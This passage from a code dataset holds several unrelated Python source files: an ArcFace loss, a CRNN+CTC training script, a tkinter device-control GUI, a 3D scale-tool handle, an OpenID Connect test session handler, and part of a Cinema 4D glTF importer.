Refer to the help to see the list of options\".format(opt=arg,pos=i+1))\n\t\telse:\n\t\t\texpecting_key = True\n\t\t\toptions[key] = available_options_casters[key](arg)\n\ttry:\n\t\tif options['merge']=='none':\n\t\t\toptions['merge'] = None\n\texcept KeyError:\n\t\tpass\n\tif not expecting_key:\n\t\traise RuntimeError(\"Expected a value after encountering key '{0}' but no value was supplied\".format(arg))\n\treturn options\n\nif __name__==\"__main__\":\n\t# Parse input from sys.argv\n\toptions = parse_input()\n\tif options['test']:\n\t\ttest()\n\telse:\n\t\tdel options['test']\n\t\tcluster_analysis(**options)\n","sub_path":"src/subject_data_analisis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":109286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"627976534","text":"import tensorflow as tf\nimport math\n\n\ndef arcface_loss(embedding, labels, out_num, w_init=None, s=64.,\n                 m=0.5):  # embedding=emb, labels=labels, w_init=w_init_method, out_num=num_classes\n    '''\n    :param embedding: the input embedding vectors\n    :param labels:  the input labels, the shape should be eg: (batch_size, 1)\n    :param s: scalar value, default is 64\n    :param out_num: output class num\n    :param m: the margin value, default is 0.5\n    :return: the final calculated output; this output is sent into tf.nn.softmax directly\n    '''\n    cos_m = math.cos(m)\n    sin_m = math.sin(m)  # cos(θ+m)=cosθcosm−sinθsinm\n    # mm = sin_m * m  # issue 1 ?\n    threshold = math.cos(math.pi - m)  # ?\n    with tf.variable_scope('arcface_loss'):\n        # inputs and weights norm\n        embedding_norm = tf.norm(embedding, axis=1,\n                                 keepdims=True)  # normalize the embeddings, shape (?,1); by default this is the Euclidean L2 norm (the vector magnitude ||x||, the distance from the point to the origin); axis picks the dimension along which the norm is computed, 0 for columns and 1 for rows\n        embedding = tf.div(embedding, embedding_norm,\n                           name='norm_embedding')  # (?,512)/(?,1) = (?,512); emb/||x|| = emb_new with ||emb_new||=1, keeping only the direction vector (unit length)\n        weights = tf.get_variable(name='embedding_weights', shape=(embedding.get_shape().as_list()[-1], out_num),\n                                  initializer=w_init,\n                                  dtype=tf.float32)  # returns an existing variable with the same definition if one already exists, otherwise creates a new one as defined by the arguments. w_init_method = tf.contrib.layers.xavier_initializer(uniform=False) is an initializer that keeps the gradient magnitude roughly the same across layers.\n        weights_norm = tf.norm(weights, axis=0, keepdims=True)  # (1, 85742); normalize the weights to remove the length information and keep only the angular information.\n        weights = tf.div(weights, weights_norm, name='norm_weights')  # (512, 85742)/(1, 85742)=(512, 85742)\n        # cos(theta+m)\n        cos_t = tf.matmul(embedding, weights, name='cos_t')  # dot product x*w = (?,512)*(512, 85742) = (?,85742); since x and the weights are both normalized, X*W = |x|*|w|cos = |1||1|cos = cos(theta)\n        cos_t2 = tf.square(cos_t, name='cos_2')  # (?,85742)\n        sin_t2 = tf.subtract(1., cos_t2, name='sin_2')  # (?,85742) (1) trig identity: sin^2 = 1 - cos^2\n        sin_t = tf.sqrt(sin_t2, name='sin_t')  # (?,85742) (2) hence sin = sqrt(sin^2)\n        cos_mt = s * tf.subtract(tf.multiply(cos_t, cos_m), tf.multiply(sin_t, sin_m),\n                                 name='cos_mt')  # (?,85742) cos(t+m) = cos_t * cos_m - sin_t * sin_m\n\n        # this condition keeps theta+m in the range [0, pi] ???\n        # 0<=theta+m<=pi\n        # -m<=theta<=pi-m\n        cond_v = cos_t - threshold  # (?,85742)\n        cond = tf.cast(tf.nn.relu(cond_v, name='if_else'), dtype=tf.bool)  # boolean mask, (?,85742): True where positive, False otherwise\n\n        keep_val = s * (cos_t - sin_m * m)  # (?,85742) ??\n        cos_mt_temp = tf.where(cond, cos_mt,\n                               keep_val)  # take the cos_mt entries where cond is True and the keep_val entries where cond is False, element-wise, forming a new matrix\n\n        mask = tf.one_hot(labels, depth=out_num, name='one_hot_mask')  # (?,85742)\n        # mask = tf.squeeze(mask, 1)\n        inv_mask = tf.subtract(1., mask, name='inverse_mask')  # (?,85742)\n\n        s_cos_t = 
tf.multiply(s, cos_t, name='scalar_cos_t')  # (?,85742); scale up the hypersphere surface so the class logits spread out more, which makes the decision boundaries easier to find\n\n        output = tf.add(tf.multiply(s_cos_t, inv_mask), tf.multiply(cos_mt_temp, mask),\n                        name='arcface_loss_output')  # (?,85742)\n    return output\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"630617115","text":"from data import *\nimport tensorflow as tf  # used directly below; the star import above may already provide it\nfrom crnn_model import crnn\nimport shutil\nimport os\nimport numpy as np\nfrom PIL import Image\n\ndef change_shape_to_32(img):\n    h, w = img.shape[0], img.shape[1]\n    scale = 32/h\n    img = Image.fromarray(img)\n    img = img.resize((int(w*scale),32))\n    img = np.array(img)\n    img = np.expand_dims(img,0)\n    return img\n\ntrain_lr_init = 1e-3\ntrain_lr_end = 1e-6\ntrainset = crnn_data()\nlogdir = \"E:/github_zdxf/tensorflow_learning/ctpn/log_ctc\"\nglobal_steps = tf.Variable(1, trainable=False, dtype=tf.int64)\nwarmup_steps = 2 * 100000\ntotal_steps = 30 * 100000\ninput_tensor = tf.keras.layers.Input([32,None,3])\noutput_tensor = crnn(input_tensor,128,512)\nmodel = tf.keras.Model(input_tensor, output_tensor)\n# model.load_weights('E:\\github_zdxf\\yolo_qqwweee\\keras-yolo3\\model_data\\yolo.h5',by_name=True,skip_mismatch=True)\noptimizer = tf.keras.optimizers.Adam()\nif os.path.exists(logdir): shutil.rmtree(logdir)\nwriter = tf.summary.create_file_writer(logdir)\ndef train_step(image_data, target, label_length, logit_length):\n    with tf.GradientTape() as tape:\n        pred_result = model(image_data, training=True)\n        total_loss = tf.nn.ctc_loss(target,pred_result,label_length,logit_length,logits_time_major=False)\n\n    gradients = tape.gradient(total_loss, model.trainable_variables)\n    optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n    tf.print(\"=> STEP %4d lr: %.16f total_loss: %4.12f\" %(global_steps, optimizer.lr.numpy(),total_loss))\n    # update learning rate\n    global_steps.assign_add(1)\n    if global_steps < warmup_steps:\n        lr = global_steps / warmup_steps *train_lr_init\n    else:\n        lr = train_lr_end + 0.5 * (train_lr_init - train_lr_end) * (\n            (1 + tf.cos((global_steps - warmup_steps) / (total_steps - warmup_steps) * np.pi))\n        )\n    optimizer.lr.assign(lr.numpy())\n\n    # writing summary data\n    with writer.as_default():\n        tf.summary.scalar(\"lr\", optimizer.lr, step=global_steps)\n        tf.summary.scalar(\"loss/total_loss\", total_loss.numpy()[0], step=global_steps)\n\n    writer.flush()\n\n\nfor epoch in range(30):\n    for ll in trainset:\n        if ll != 'error!' 
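# --- Hedged numpy check (illustrative, not part of either record): the core
# identity used by arcface_loss above, cos(t + m) = cos(t)cos(m) - sin(t)sin(m),
# applied directly to a few cosine logits. For any t with t + m < pi the
# margin strictly shrinks the target logit, which is the intended penalty.
import math
import numpy as np

def add_angular_margin(cos_t, m=0.5):
    sin_t = np.sqrt(np.clip(1.0 - cos_t ** 2, 0.0, 1.0))
    return cos_t * math.cos(m) - sin_t * math.sin(m)

cos_t = np.array([0.9, 0.2, -0.4])
print(add_angular_margin(cos_t))   # each value is smaller than the input cos_t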
and ll != None:\n sequence, img = ll\n img = change_shape_to_32(img)\n label_length = sequence.shape[0]\n sequence = np.array(sequence).T\n logit_length = int(img.shape[1]//4)\n train_step(img,sequence,[label_length],[logit_length])\n if int(global_steps.value().numpy()) % 100 == 0:\n model.save_weights(\"E:/github_zdxf/weights/crnn+ctc_weights/{}_{}.h5\".format(epoch,int(global_steps.value().numpy())))\n model.save_weights(\"E:/github_zdxf/weights/crnn+ctc_weights/{}.h5\".format(epoch))\n\n\n\n","sub_path":"ctpn/train_crnn+ctc.py","file_name":"train_crnn+ctc.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"383098325","text":"import tkinter\nimport socket\nimport asyncio\nimport nest_asyncio\nimport threading\n\nBLOCK = True\n\n\nclass Evb(tkinter.Frame):\n\n def __init__(self, main, connection):\n tkinter.Frame.__init__(self, main)\n self.__main_window = main\n self.__main_window.geometry(\"1000x612\")\n self.__main_window.resizable(0, 0)\n self.__main_window.title('evb')\n self.__connection = connection\n self.__window_background_img = tkinter.PhotoImage(file=\"Przechwytywanie.PNG\")\n self.__pixel = tkinter.PhotoImage(width=1, height=1)\n self.__text_var = \" \"\n self.__led = []\n self.__lcd = None\n self.__rgb = None\n nest_asyncio.apply()\n self.loop()\n\n def th(self, loop):\n loop.run_until_complete(self.led_loop())\n\n def th2(self, loop2):\n loop2.run_until_complete(self.text_loop())\n\n def th3(self, loop3):\n loop3.run_until_complete(self.rgb_loop())\n\n def loop(self):\n window_background = tkinter.Label(self.__main_window)\n window_background.config(image=self.__window_background_img)\n window_background.place(relwidth=1, relheight=1)\n button1 = tkinter.Button(self.__main_window, text='1', command=lambda: self.click(0),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button1.place(relx=0.547, rely=0.943, anchor=tkinter.CENTER)\n button2 = tkinter.Button(self.__main_window, text='2', command=lambda: self.click(1),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button2.place(relx=0.5815, rely=0.943, anchor=tkinter.CENTER)\n button3 = tkinter.Button(self.__main_window, text='3', command=lambda: self.click(2),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button3.place(relx=0.616, rely=0.943, anchor=tkinter.CENTER)\n button4 = tkinter.Button(self.__main_window, text='4', command=lambda: self.click(3),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button4.place(relx=0.6505, rely=0.943, anchor=tkinter.CENTER)\n button5 = tkinter.Button(self.__main_window, text='5', command=lambda: self.click(4),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button5.place(relx=0.685, rely=0.943, anchor=tkinter.CENTER)\n button6 = tkinter.Button(self.__main_window, text='6', command=lambda: self.click(5),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button6.place(relx=0.7195, rely=0.943, anchor=tkinter.CENTER)\n button7 = tkinter.Button(self.__main_window, text='7', command=lambda: self.click(6),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button7.place(relx=0.754, rely=0.943, anchor=tkinter.CENTER)\n button8 = tkinter.Button(self.__main_window, text='8', command=lambda: self.click(7),\n compound=tkinter.CENTER, image=self.__pixel, width=4, height=16)\n button8.place(relx=0.7885, rely=0.943, anchor=tkinter.CENTER)\n volume_button1 = 
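# --- Hedged sketch (standalone version of the learning-rate schedule inside
# train_step above: linear warmup followed by cosine decay). Constants mirror
# the training script's train_lr_init/train_lr_end defaults.
import numpy as np

def lr_at(step, warmup_steps, total_steps, lr_init=1e-3, lr_end=1e-6):
    if step < warmup_steps:
        return step / warmup_steps * lr_init          # linear warmup
    progress = (step - warmup_steps) / (total_steps - warmup_steps)
    return lr_end + 0.5 * (lr_init - lr_end) * (1 + np.cos(progress * np.pi))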
tkinter.Button(self.__main_window, text='-', command=lambda: self.f1(1),\n compound=tkinter.CENTER, image=self.__pixel, width=1, height=20)\n volume_button1.place(relx=0.836, rely=0.947, anchor=tkinter.CENTER)\n volume_button2 = tkinter.Button(self.__main_window, text='+', command=lambda: self.f1(2),\n compound=tkinter.CENTER, image=self.__pixel, width=1, height=20)\n volume_button2.place(relx=0.864, rely=0.947, anchor=tkinter.CENTER)\n self.__lcd = tkinter.Label(self.__main_window, bg='grey', text=self.__text_var, width=57, height=7)\n self.__lcd.place(relx=0.718, rely=0.24, anchor=tkinter.CENTER)\n\n for i in range(8):\n led = tkinter.Label(self.__main_window, bg=\"#003200\", image=self.__pixel, width=8, height=15)\n self.__led.append(led)\n led.place(relx=0.4207 + i * 0.0174, rely=0.573, anchor=tkinter.CENTER)\n\n self.__rgb = tkinter.Label(self.__main_window, bg=\"#ffff9f\", image=self.__pixel, width=35, height=35)\n self.__rgb.place(relx=0.587, rely=0.549, anchor=tkinter.CENTER)\n l1 = asyncio.get_event_loop()\n l2 = asyncio.get_event_loop()\n l3 = asyncio.get_event_loop()\n threading.Thread(target=self.th, args=(l1,)).start()\n threading.Thread(target=self.th2, args=(l2,)).start()\n threading.Thread(target=self.th3, args=(l3,)).start()\n\n def click(self, number):\n \"buttons\"\n self.f4(number)\n\n async def led_loop(self):\n while True:\n try:\n self.f2()\n await asyncio.sleep(0.2)\n except Exception as e:\n pass\n\n async def rgb_loop(self):\n while True:\n try:\n self.f6()\n await asyncio.sleep(1)\n except Exception as e:\n pass\n\n async def text_loop(self):\n while True:\n try:\n self.f3()\n await asyncio.sleep(1.5)\n except Exception as e:\n pass\n\n def f1(self, what):\n \"set the audio volume; what selects - or +\"\n\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(f\"1{what}\", \"utf-8\"))\n r = self.__connection.recv(64)\n BLOCK = True\n\n def f2(self):\n global BLOCK\n vol = 0\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"2\", \"utf-8\"))\n r = self.__connection.recv(64)\n r = r.decode(\"utf-8\")  # assign the decoded string so int(vol) below gets text, not bytes\n vol = r[1:]\n temp = round(8 * int(vol) / 100)\n for led in range(temp):\n self.__led[led].config(bg=\"#00ff00\")\n for led in range(temp, len(self.__led)):\n self.__led[led].config(bg=\"#003200\")\n BLOCK = True\n\n def f3(self):\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"3\", \"utf-8\"))\n r = self.__connection.recv(64)\n r = r.decode(\"utf-8\")\n self.__text_var = r[1:]\n self.__lcd.config(text=self.__text_var)\n BLOCK = True\n\n def f4(self, number):\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"4{}\".format(number), \"utf-8\"))\n r = self.__connection.recv(64)\n BLOCK = True\n\n def f6(self):\n global BLOCK\n if BLOCK:\n BLOCK = False\n self.__connection.send(bytes(\"6\", \"utf-8\"))\n color = self.__connection.recv(64)\n color = color.decode(\"utf-8\")\n self.__rgb.config(bg=color)\n BLOCK = True\n","sub_path":"evb.py","file_name":"evb.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"374638573","text":"# Copyright (c) 2015 Ultimaker B.V.\n# Uranium is released under the terms of the AGPLv3 or higher.\n\nfrom UM.Scene.ToolHandle import ToolHandle\nfrom UM.Mesh.MeshData import MeshData\nfrom UM.Mesh.MeshBuilder import MeshBuilder\nfrom UM.Math.Vector import Vector\n\nclass ScaleToolHandle(ToolHandle):\n def __init__(self, parent = None):\n super().__init__(parent)\n\n self._lineWidth = 
0.5\n self._lineLength= 40\n self._handlePosition = 40\n self._handleWidth = 4\n\n self._activeLineWidth = 0.8\n self._activeLineLength = 40\n self._activeHandlePosition = 40\n self._activeHandleWidth = 15\n\n #SOLIDMESH -> LINES\n mb = MeshBuilder()\n\n mb.addCube(\n width = self._lineWidth,\n height = self._lineLength,\n depth = self._lineWidth,\n center = Vector(0, self._handlePosition/2, 0),\n color = ToolHandle.YAxisColor\n )\n mb.addCube(\n width = self._lineLength,\n height = self._lineWidth,\n depth = self._lineWidth,\n center = Vector(self._handlePosition/2, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._lineWidth,\n height = self._lineWidth,\n depth = self._lineLength,\n center = Vector(0, 0, self._handlePosition/2),\n color = ToolHandle.ZAxisColor\n )\n\n #SOLIDMESH -> HANDLES\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(0, 0, 0),\n color = ToolHandle.AllAxisColor\n )\n\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(0, self._handlePosition, 0),\n color = ToolHandle.YAxisColor\n )\n\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(self._handlePosition, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._handleWidth,\n height = self._handleWidth,\n depth = self._handleWidth,\n center = Vector(0, 0, self._handlePosition),\n color = ToolHandle.ZAxisColor\n )\n self.setSolidMesh(mb.getData())\n\n #SELECTIONMESH -> LINES\n mb = MeshBuilder()\n mb.addCube(\n width = self._activeLineWidth,\n height = self._activeLineLength,\n depth = self._activeLineWidth,\n center = Vector(0, self._activeHandlePosition/2, 0),\n color = ToolHandle.YAxisColor\n )\n\n mb.addCube(\n width = self._activeLineLength,\n height = self._activeLineWidth,\n depth = self._activeLineWidth,\n center = Vector(self._activeHandlePosition/2, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._activeLineWidth,\n height = self._activeLineWidth,\n depth = self._activeLineLength,\n center = Vector(0, 0, self._activeHandlePosition/2),\n color = ToolHandle.ZAxisColor\n )\n\n #SELECTIONMESH -> HANDLES\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(0, 0, 0),\n color = ToolHandle.AllAxisColor\n )\n\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(0, self._activeHandlePosition, 0),\n color = ToolHandle.YAxisColor\n )\n\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(self._activeHandlePosition, 0, 0),\n color = ToolHandle.XAxisColor\n )\n\n mb.addCube(\n width = self._activeHandleWidth,\n height = self._activeHandleWidth,\n depth = self._activeHandleWidth,\n center = Vector(0, 0, self._activeHandlePosition),\n color = ToolHandle.ZAxisColor\n )\n\n self.setSelectionMesh(mb.getData())\n","sub_path":"plugins/Tools/ScaleTool/ScaleToolHandle.py","file_name":"ScaleToolHandle.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227286004","text":"import copy\nimport logging\n\nfrom otest import Done\nfrom otest import session\n\nfrom oidctest.prof_util import map_prof\n\n__author__ = 
'roland'\n\nlogger = logging.getLogger(__name__)\n\n\nclass Node(object):\n def __init__(self, name, desc, mti=None):\n self.name = name\n self.desc = desc\n self.mti = mti\n self.state = 0\n self.info = \"\"\n self.rmc = False\n self.experr = False\n self.complete = False\n\n\nclass SessionHandler(session.SessionHandler):\n def session_setup(self, path=\"\", index=0):\n logger.info(\"session_setup\")\n\n _keys = list(self.keys())\n for key in _keys:\n if key.startswith(\"_\"):\n continue\n elif key in [\"tests\", \"flow_names\", \"response_type\",\n \"test_info\", \"profile\"]: # don't touch !\n continue\n else:\n del self[key]\n\n self[\"testid\"] = path\n for node in self[\"tests\"]:\n if node.name == path:\n self[\"node\"] = node\n break\n\n if \"node\" not in self:\n raise Exception(\"Unknown node name: {}\".format(path))\n\n self[\"flow\"] = self.test_flows[path]\n self[\"sequence\"] = copy.deepcopy(self[\"flow\"][\"sequence\"])\n self[\"sequence\"].append(Done)\n self[\"index\"] = index\n self.session = session\n\n def init_session(self, profile=None):\n if not profile:\n profile = self.profile\n\n f_names = list(self.test_flows.keys())\n f_names.sort()\n self[\"flow_names\"] = []\n for k in self.order:\n k += '-'\n l = [z for z in f_names if z.startswith(k)]\n self[\"flow_names\"].extend(l)\n\n _tests = []\n for k in self[\"flow_names\"]:\n _test = self.test_flows[k]\n if map_prof(profile, _test[\"profile\"]):\n try:\n kwargs = {\"mti\": _test[\"mti\"]}\n except KeyError:\n kwargs = {}\n _tests.append(Node(k, _test[\"desc\"], **kwargs))\n\n self[\"tests\"] = _tests\n self[\"test_info\"] = {}\n self[\"profile\"] = profile\n self.session = session\n return session\n","sub_path":"src/oidctest/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357299617","text":"# Copyright(c) 2017-2019 Sketchfab Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# TODO:\n# - Add Morphing support (cf \"scifi girl\")\n# - Fix skinning for some bones extremities (hair on \"ruby rose\", leg on \"arachnea\")\n\nimport os\nimport math\nimport sys\nimport c4d\nimport shutil\n\nfrom c4d import plugins, gui\nfrom c4d.modules.character import CAWeightTag\n\nfrom gltfio.imp.gltf2_io_gltf import glTFImporter\nfrom gltfio.imp.gltf2_io_binary import BinaryData\nfrom sketchfab.utils import Utils\n\n\nclass TextureWrapper:\n def __init__(self, filepath, sampler):\n self.filepath = filepath\n self.sampler = sampler\n\n def to_c4d_shader(self, alpha_only=False):\n sha = c4d.BaseList2D(c4d.Xbitmap)\n sha[c4d.BITMAPSHADER_FILENAME] = self.filepath\n\n if alpha_only:\n ls = c4d.LayerSet()\n ls.SetMode(c4d.LAYERSETMODE_LAYERALPHA)\n sha[c4d.BITMAPSHADER_LAYERSET] = ls\n\n # Barely support texture filtering\n if self.sampler.min_filter in (9728, 9984) or self.sampler.mag_filter in (9728, 9984):\n sha[c4d.BITMAPSHADER_INTERPOLATION] = c4d.BITMAPSHADER_INTERPOLATION_NONE\n\n return 
sha\n\n\nclass Skin:\n\n def __init__(self, gltf, skin_idx, mesh_idx, node_idx):\n\n # Get the data\n self.gltf_skin = gltf.data.skins[skin_idx]\n self.node_idx = [node_idx]\n self.mesh_idx = [mesh_idx]\n self.skin_idx = skin_idx\n self.name = self.gltf_skin.name\n self.root = self.gltf_skin.skeleton\n self.joints = self.gltf_skin.joints\n self.ibm_idx = self.gltf_skin.inverse_bind_matrices\n self.IBMs = BinaryData.get_data_from_accessor(gltf, self.ibm_idx)\n\n\nclass ImportGLTF(plugins.ObjectData):\n\n #############################\n # BASE FUNCTIONS\n #############################\n\n def __init__(self, progress_callback=None):\n self.progress_callback = progress_callback\n self.model_dir = ''\n self.gltf_textures = []\n self.gltf_materials = []\n self.is_done = False\n self.has_vertex_colors = False\n self.has_problematic_polygons = False\n self.has_morphing = False\n\n def run(self, filepath, uid=None):\n\n print(\"\\nImporting %s\\n\" % filepath)\n\n self.model_dir = os.path.split(filepath)[0]\n self.is_done = False\n gltf = glTFImporter(filepath)\n success, txt = gltf.read()\n\n # Discard point clouds\n if not self.has_polygons(gltf):\n msg = \"No polygons detected in the model.\\nPoint clouds cannot be imported into Cinema 4D.\\nAborting.\"\n gui.MessageDialog(text=msg, type=c4d.GEMB_OK)\n self.is_done = True\n self.progress_callback('Done', 1, 1)\n return \n\n # Import\n self.import_gltf_textures(gltf)\n imported_materials = self.import_gltf_materials(gltf)\n skins = self.parse_gltf_skins(gltf)\n nodes = self.create_c4d_nodes(gltf, skins, imported_materials)\n self.create_c4d_hierarchy(gltf, nodes, skins)\n self.create_c4d_weights(gltf, nodes, skins)\n self.import_animations(gltf, nodes)\n self.finish_import(gltf, nodes)\n\n def finish_import(self, gltf, nodes):\n gltf_meta = gltf.data.asset\n if gltf_meta.extras:\n title = gltf_meta.extras.get('title', 'Imported')\n author = gltf_meta.extras.get('author')\n license = gltf_meta.extras.get('license')\n note = ''\n\n # Rename root node with model title, and add a node without transforms\n roots = [nodes[n] for n in nodes if nodes[n].GetUp() is None]\n\n root_node = c4d.BaseObject(c4d.Onull)\n root_node.SetName(title)\n c4d.documents.GetActiveDocument().InsertObject(root_node)\n for obj in roots:\n obj.InsertUnder(root_node)\n c4d.documents.GetActiveDocument().SetChanged()\n\n # Import message\n if self.has_morphing:\n note = note + ' - The model seems to contain morphing animations, which are not supported yet.'\n if self.has_vertex_colors:\n note = note + \" - Vertex colors have been imported but disabled to avoid unexpected results\"\n note = note + \"\\nYou can enable them manually in their material Color and Reflection layers named 'Vertex Colors'\"\n if self.has_problematic_polygons:\n note = note + \" - Some problematic polygons were encountered in the glTF model.\"\n note = note + \"\\nIf the imported model does not display as expected,\\nyou can try to download the source file of the model from Sketchfab\"\n if note:\n note = '\\n\\nWarnings: \\n' + note\n message = 'Successfully imported model \"{}\"'.format(title)\n if author and license:\n message = message + u' by \"{}\" under the license \"{}\"'.format(Utils.remove_url(author), Utils.remove_url(license))\n message = message + note\n gui.MessageDialog(text=message, type=c4d.GEMB_OK)\n\n self.progress_callback('Done', 1, 1)\n c4d.DrawViews()\n self.is_done = True\n c4d.EventAdd()\n\n def AbortImport(self):\n pass\n\n #############################\n # HELPERS\n 
#############################\n\n def list_to_vec3(self, li):\n return c4d.Vector(li[0], li[1], li[2])\n\n def switch_handedness_v3(self, v3):\n v3[2] = -v3[2]\n return v3\n\n def quat_to_eulerxyz(self, quat):\n \n x, y, z, w = quat\n\n X = math.atan2(2*(w*x+y*z), 1-2*(x*x+y*y))\n tmp = 2*(w*y-x*z)\n Y = math.asin( 1 if tmp > 1 else -1 if tmp<-1 else tmp)\n Z = math.atan2(2*(x*y+w*z), 1-2*(y*y+z*z))\n\n # Handle singularities (half a degree threshold)\n if ((Y-math.pi/2)**2)**0.5 < math.pi/360:\n sign = math.copysign(1,Y)\n X = sign * 2 * math.atan2(x,w)\n Y = sign * math.pi/2\n Z =0\n\n return c4d.Vector(X, Y, Z)\n\n def gltf_matrix_to_c4d(self, M):\n\n v1 = c4d.Vector(M[0], M[1], M[2])\n v2 = c4d.Vector(M[4], M[5], M[6])\n v3 = c4d.Vector(M[8], M[9], M[10])\n off = c4d.Vector(M[12], M[13], M[14])\n\n # RHS to LHS\n v1.z *= -1\n v2.z *= -1\n v3.x *= -1\n v3.y *= -1\n off.z *= -1\n\n return c4d.Matrix(off, v1, v2, v3)\n\n def has_polygons(self, gltf):\n # Try to find a geometry\n for node_idx in range(len(gltf.data.nodes)):\n gltf_node = gltf.data.nodes[node_idx]\n if gltf_node.mesh is not None:\n gltf_mesh = gltf.data.meshes[gltf_node.mesh]\n for prim in gltf_mesh.primitives:\n if prim.indices is not None:\n return True\n return False\n\n #############################\n # GLTF PARSING / C4D OBJECTS\n #############################\n\n def create_c4d_nodes(self, gltf, skins, materials):\n nodes = {} # Used to store C4D objects in parallel with GlTF nodes\n joints = list(set([j for jts in [skins[i].joints for i in skins] for j in jts]))\n\n for i in range(len(gltf.data.nodes)):\n\n gltf_node = gltf.data.nodes[i]\n c4d_object, name = None, None\n \n if i not in joints:\n if gltf_node.mesh is not None:\n c4d_object = self.convert_mesh(gltf, gltf_node.mesh, materials)\n name = gltf.data.meshes[gltf_node.mesh].name if gltf.data.meshes[gltf_node.mesh].name is not None else \"Mesh_%d\" % i\n else:\n c4d_object = c4d.BaseObject(c4d.Onull)\n name = gltf_node.name if gltf_node.name else \"GLTFObject\"\n else:\n c4d_object = c4d.BaseObject(c4d.Ojoint)\n name = gltf_node.name if gltf_node.name else \"GLTFJoint\"\n\n # Name\n nodes[i] = c4d_object\n c4d_object.SetName(name)\n\n # Transforms \n c4d_object.SetRotationOrder(5) # Local XYZ\n c4d_object.SetQuaternionRotationMode(1, 0)\n ignoreTransforms = gltf_node.mesh is not None and gltf_node.skin is not None\n if True:#not ignoreTransforms:\n self.apply_transforms(c4d_object, gltf_node)\n\n # LOG\n \"\"\"\n trans = \"\"\n if gltf_node.matrix is not None:\n trans = \"MAT: \" + str(gltf_node.matrix)\n else:\n if gltf_node.translation:\n trans += \"T: %s, \" % str(gltf_node.translation)\n if gltf_node.rotation:\n trans += \"R: %s, \" % str(gltf_node.rotation)\n if gltf_node.scale:\n trans += \"S: %s, \" % str(gltf_node.scale)\n\n print(\n str(i).zfill(3) + \", \"\n + ((\"Mesh\" if gltf_node.mesh else \"Null\") if i not in joints else \"Bone\") + \", \"\n + (\"MAT\" if gltf_node.matrix else \"TRS\")\n + \": %s, \" % name\n + (\" (ignored)\" if ignoreTransforms else \"\")\n + trans\n )\n \"\"\"\n\n self.progress_callback(\"Importing nodes\", i + 1, len(gltf.data.nodes))\n\n return nodes\n\n def apply_transforms(self, obj, gltf_node):\n\n if gltf_node is not None:\n\n if gltf_node.matrix:\n\n c4d_mat = self.gltf_matrix_to_c4d(gltf_node.matrix)\n obj.SetMg(c4d_mat)\n\n else:\n\n if gltf_node.rotation:\n R = self.quat_to_eulerxyz(gltf_node.rotation)\n obj.SetRelRot((R[0], R[1], -R[2]))\n if gltf_node.scale:\n scale = gltf_node.scale\n 
obj.SetRelScale(c4d.Vector(scale[0], scale[1], scale[2]))\n if gltf_node.translation:\n tr = gltf_node.translation\n obj.SetRelPos(c4d.Vector(tr[0], tr[1], -tr[2]))\n \n def convert_primitive(self, prim, gltf, materials):\n # Helper functions\n def float2bytes(f):\n int_value = int(math.fabs(f * 32000.0))\n high_byte = int(int_value / 256)\n low_byte = int_value - 256 * high_byte\n\n if f < 0:\n high_byte = 255 - high_byte\n low_byte = 255 - low_byte\n\n return (low_byte, high_byte)\n\n # Normals tag. (Contains 12 WORDs per polygon, enumerated like the following: ax,ay,az,bx,by,bz,cx,cy,cz,dx,dy,dz.\n # The value is the Real value of the normal vector component multiplied by 32000.0.)\n def set_normals(normal_tag, polygon, normal_a, normal_b, normal_c, normal_d):\n normal_list = [normal_a, normal_b, normal_c, normal_d]\n normal_buffer = normal_tag.GetLowlevelDataAddressW()\n vector_size = 6\n component_size = 2\n\n for v in range(4):\n normal = normal_list[v]\n component = [normal.x, normal.y, normal.z]\n\n for c in range(3):\n low_byte, high_byte 